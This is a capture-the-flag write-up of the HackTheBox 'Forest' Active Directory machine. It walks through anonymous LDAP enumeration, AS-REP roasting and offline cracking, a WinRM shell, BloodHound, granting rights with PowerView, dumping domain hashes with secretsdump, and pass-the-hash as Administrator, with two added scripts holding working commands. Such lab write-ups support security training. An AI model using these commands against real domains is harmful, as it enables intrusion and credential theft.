HackTheBox | Forest
This is actually the first AD box I’ve ever done.
Let’s start with an Nmap scan of the target, saving the output to a file:
Once it completes, we just need to cat out the .txt file.
Since we know the domain from the scan, let’s try ldapsearch without any credentials to check whether anonymous authentication is allowed. The query comes back with directory data instead of an error, so null bind is enabled.
There is a ton of information here. The first thing I did was try to find any and all account names.
Still a ton of unique account names here. Off the rip, the interesting ones appear to be: andy, lucinda, mark, santi, and sebastien.
To clean up the ldapsearch output, let’s change our initial command a bit.
Thankfully, all of our identified users are at the bottom of this output.
This includes a slew of information, including an email address for each user. Let’s build a username list from it to try some password attacks.
Let’s get this started.
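The enumeration above in script form, added here as an example and not taken from the original post: a null-bind check, a narrowed ldapsearch that asks only for user objects and the two attributes the wordlist needs, and a small parser that turns the LDIF into a username list. The DC address, the base DN, the domain corp.local and the sample LDIF (the five users named above plus a machine account) are constructed for the example; the real values come from your own scan and the null-bind reply.

```shell
#!/usr/bin/env bash
# Added example (not from the original post): anonymous LDAP enumeration and
# building a username list from the result. DC_IP and BASE_DN are assumptions;
# take the real ones from your Nmap output and the null-bind check below.
DC_IP="${DC_IP:-10.10.10.10}"
BASE_DN="${BASE_DN:-DC=corp,DC=local}"

# Null-bind check: -x is a simple bind, and with no -D/-w it is anonymous.
# If the rootDSE query returns namingContexts instead of an error, anonymous
# bind is allowed, and the base DN for the domain is right there in the reply.
ldap_null_bind_check() {   # $1 = DC address
  ldapsearch -x -H "ldap://$1" -b '' -s base -LLL namingcontexts
}

# The narrowed query: only user objects, only the two attributes the
# wordlist needs, instead of dumping the whole directory and reading it.
ldap_enum_users() {   # $1 = DC address, $2 = base DN
  ldapsearch -x -H "ldap://$1" -b "$2" -LLL \
    '(&(objectCategory=person)(objectClass=user))' sAMAccountName mail
}

# Turn LDIF on stdin into one candidate username per line: every
# sAMAccountName plus the local part of every mail address, lowercased and
# deduplicated, with machine accounts (trailing $) dropped.
extract_users() {
  awk '
    /^sAMAccountName: / { print $2 }
    /^mail: /           { split($2, p, "@"); print p[1] }
  ' | grep -v '\$$' | tr 'A-Z' 'a-z' | sort -u
}

# Constructed LDIF standing in for real ldapsearch output: the five users
# named above (one with no mail, one with only mail, one in mixed case)
# plus a machine account that must not end up in the list.
SAMPLE_LDIF='dn: CN=andy,CN=Users,DC=corp,DC=local
sAMAccountName: andy
mail: andy@corp.local

dn: CN=lucinda,CN=Users,DC=corp,DC=local
sAMAccountName: lucinda
mail: lucinda@corp.local

dn: CN=mark,CN=Users,DC=corp,DC=local
sAMAccountName: Mark
mail: Mark@corp.local

dn: CN=santi,CN=Users,DC=corp,DC=local
sAMAccountName: santi

dn: CN=sebastien,CN=Users,DC=corp,DC=local
mail: sebastien@corp.local

dn: CN=WS01,CN=Computers,DC=corp,DC=local
sAMAccountName: WS01$'

if [ "${RUN_LIVE:-0}" = 1 ]; then
  ldap_null_bind_check "$DC_IP"
  ldap_enum_users "$DC_IP" "$BASE_DN" | extract_users > users.txt
  wc -l users.txt
else
  printf '%s\n' "$SAMPLE_LDIF" | extract_users   # prints the five names
fi
```

Run it with RUN_LIVE=1 against a real DC to write users.txt; without it, the script only exercises the parser on the constructed sample. Pulling the mail local part as well as sAMAccountName matters because the two do not always agree, and a password spray against a name that only exists as an email alias is a wasted round.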
Now we can try an Impacket script, GetNPUsers.py. It looks for accounts that don’t require Kerberos pre-authentication: for those, the KDC hands back an AS-REP to anyone who asks, and part of that reply is encrypted with a key derived from the account’s password, so it can be cracked offline (AS-REP roasting). We actually got a hit for another account running this.
We also get a hash for that account.
John cracks this pretty quickly.
To say I got a little stuck here is an understatement. I ended up running nmap again with a less aggressive scan.
This led me to WinRM. I actually wasn’t aware it would read as HTTP with -sV. At this point I also stopped the password attack.
Now we retrieve the user flag.
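The foothold steps above as one script, added here as an example and not part of the original post: AS-REP roast the username list with GetNPUsers.py, crack the result with john, pull the account and password back out of john’s --show line, and open the WinRM shell with evil-winrm. The domain, DC address, wordlist path and the sample cracked line (a hypothetical account svc-example with password Winter2019 and fake hash bytes) are assumptions; nothing here names the account the post actually found.

```shell
#!/usr/bin/env bash
# Added example (not from the original post): AS-REP roasting the enumerated
# users and using the cracked credential. DOMAIN, DC_IP and WORDLIST are
# assumptions for the example.
DOMAIN="${DOMAIN:-corp.local}"
DC_IP="${DC_IP:-10.10.10.10}"
WORDLIST="${WORDLIST:-/usr/share/wordlists/rockyou.txt}"

# Ask the DC for an AS-REP for every name in the list without pre-auth.
# Accounts with "Do not require Kerberos preauthentication" set come back as
# a crackable hash; the rest are reported as needing pre-auth or not existing.
asrep_roast() {   # $1 = users file, $2 = output file
  GetNPUsers.py "$DOMAIN/" -usersfile "$1" -format john -dc-ip "$DC_IP" \
    -no-pass -outputfile "$2"
}

# Crack the AS-REP hashes; the encrypted part is keyed by the user's password.
crack_asrep() {   # $1 = hash file
  john --wordlist="$WORDLIST" --format=krb5asrep "$1"
  john --show --format=krb5asrep "$1"
}

# Pull "user realm password" out of one line of `john --show` output.
# GetNPUsers' john format is $krb5asrep$user@REALM:..., its hashcat format is
# $krb5asrep$23$user@REALM:...; john shows both with ":password" appended, and
# sometimes drops the hash bytes, so all four shapes are handled here. The
# last ':'-separated field is taken as the password, so a password that
# itself contains ':' would need a different split.
parse_cracked() {   # $1 = line
  local line=$1 prefix='$krb5asrep$' userrealm
  userrealm=${line#"$prefix"}
  userrealm=${userrealm%%:*}                 # [23$]user@REALM
  case $userrealm in
    [0-9]*'$'*) userrealm=${userrealm#*'$'} ;;   # strip the etype prefix
  esac
  printf '%s %s %s\n' "${userrealm%%@*}" "${userrealm#*@}" "${line##*:}"
}

# WinRM: the port that Nmap -sV labels as http (5985, Microsoft HTTPAPI).
winrm_shell() {   # $1 = user, $2 = password
  evil-winrm -i "$DC_IP" -u "$1" -p "$2"
}

# Constructed john --show line with fake hash bytes, standing in for real output.
SAMPLE_CRACKED='$krb5asrep$23$svc-example@CORP.LOCAL:0f1e2d3c4b5a69788796a5b4c3d2e1f0$deadbeef00112233:Winter2019'

if [ "${RUN_LIVE:-0}" = 1 ]; then
  asrep_roast users.txt asrep.txt
  crack_asrep asrep.txt
  set -- $(parse_cracked "$(john --show --format=krb5asrep asrep.txt | head -n1)")
  winrm_shell "$1" "$3"
else
  parse_cracked "$SAMPLE_CRACKED"   # prints: svc-example CORP.LOCAL Winter2019
fi
```

Without RUN_LIVE=1 only the parser runs, on the constructed line. The parser is there because the roasted account is usually not one of the users you spotted by hand, so the next step (the WinRM login) should be fed from john’s output rather than retyped.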
Privilege escalation time. For the sake of keeping it classy, let’s use BloodHound.
For some reason, no matter how many times I ran this, the groups file that was generated was always empty.
After taking a break and coming back later, I decided I would try running the exe version of the tool directly on the system. I ended up hosting it with impacket and utilizing New-PSDrive to move the file over.
Finally, after ingesting this into BloodHound, it worked.
The most interesting part was this:
Let’s add a new user now, so that we have an account of our own to hand rights to.
Now we need PowerView to give that user the rights the BloodHound path leads to.
To finish this off, we can run secretsdump against the DC as that user to pull the domain hashes.
Now let’s connect as Administrator by passing the hash.